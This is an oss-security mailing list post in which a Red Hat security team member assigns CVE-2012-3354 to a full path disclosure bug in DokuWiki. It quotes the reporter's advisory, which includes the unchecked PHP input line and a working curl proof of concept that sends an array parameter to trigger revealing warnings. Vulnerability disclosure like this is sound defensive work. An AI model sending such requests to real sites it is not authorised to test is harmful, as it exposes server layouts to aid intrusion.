Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) Source code repositories (CVSweb) File archive & mirrors How to verify digital signatures OVE IDs What's new

Date: Sun, 24 Jun 2012 23:17:49 -0600
From: Kurt Seifried <kseifried@...hat.com>
To: oss-security@...ts.openwall.com
CC: Felipe Pena <felipensp@...il.com>
Subject: Re: CVE request: Full path disclosure in DokuWiki

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On 06/24/2012 06:40 AM, Felipe Pena wrote:
> Full path disclosure in DokuWiki 
> ======================================== DokuWiki is a simple to
> use Wiki aimed at the documentation needs of a small company. It
> works on plain text files and thus needs no database. It has a 
> simple but powerful syntax which makes sure the datafiles remain
> readable outside the Wiki.
> 
> The POST input 'prefix' is not checked/casted for proper data type
> before passing to PHP's substr() function, which lead to displays
> an warning with sensitive information on server with PHP error
> level enabled:
> 
> $PRE   = cleanText(substr($_POST['prefix'], 0, -1));
> 
> $ curl -dprefix[]=1 http://localhost/dokuwiki/doku.php 2> /dev/null
> | grep Warning <b>Warning</b>:  substr() expects parameter 1 to be
> string, array given in <b>/var/www/dokuwiki/doku.php</b> on line
> <b>47</b><br /> <b>Warning</b>:  Cannot modify header information -
> headers already sent by (output started at
> /var/www/dokuwiki/doku.php:47) in 
> <b>/var/www/dokuwiki/inc/actions.php</b> on line <b>180</b><br />
> 
> Affected versions: ======================================== - Angua
> (RC1) - Rincewind - Anteater
> 
> References: ======================================== 
> http://www.freelists.org/post/dokuwiki/Fwd-DokuWiki-Full-path-disclosure
>
>  Credits: ======================================== This
> vulnerability was discovered by Felipe Pena. Twitter: @felipensp

Please use CVE-2012-3354 for this issue.

- -- 
Kurt Seifried Red Hat Security Response Team (SRT)
PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQIcBAEBAgAGBQJP5/R9AAoJEBYNRVNeJnmTuy4QAMQ1Lde156PpN81VAVaE9XUk
vcZ6arWAvYIJzMMYlwVZlWdfhQbds4v0IbuefugnsS7XMD5/+Gn0Y07ulqTWiDMY
dQ6ESNkVvTW959S977aSullrYlF3LDgYxb48dvclza8fxQxQZRKGZ/ppHJ2+CGqn
sGwiJjF/zAQDYRiNl9+FE2aLrWjUTU1IEIwAHzPMa/jMO/XPhMVjU48JntMd1f/n
rcpUbTVByY2dFaPGpH8APFCjPlCk3fkWZCzGmGRNkZQBvGrGBFOHdbeP+zSITwd5
ksQqhzOG4X43VGMpkMREgMc9+korDplKGAjBGGHZKOGQA6ad3rjspHpnmfkyn7wY
Ug3aolQtwsOyzYBA/LRpYNZcRTYGRRSnoutjNkGaAZHjiLKixrlmv99CxubCefLf
d0q7qF1gMaZX3bY1X9cYcatKDI/26Xlr1zsDYXyQsmqNbqqsvaZ98lq3dR3r1BbD
kEIkEF2kCvB8XEtgpPni7MwyLI5vf7iFOMyVzVmgT8jvTME1dpph0aL7L0nm65Ko
YkgGk8ppC3wN2v9AC6N/fAAFUzPuCUGmIDDMqXL6/T/4Kxem0a2NzlTdxpUgQqgW
m7xs0HgdBjRpeTD8Oz0yWpirQDjplLpbNRC08ZekRn8Tuz4pjtveHuSJMNLeNPOs
vO1optUzhVkE9I0lJAuE
=gzwk
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.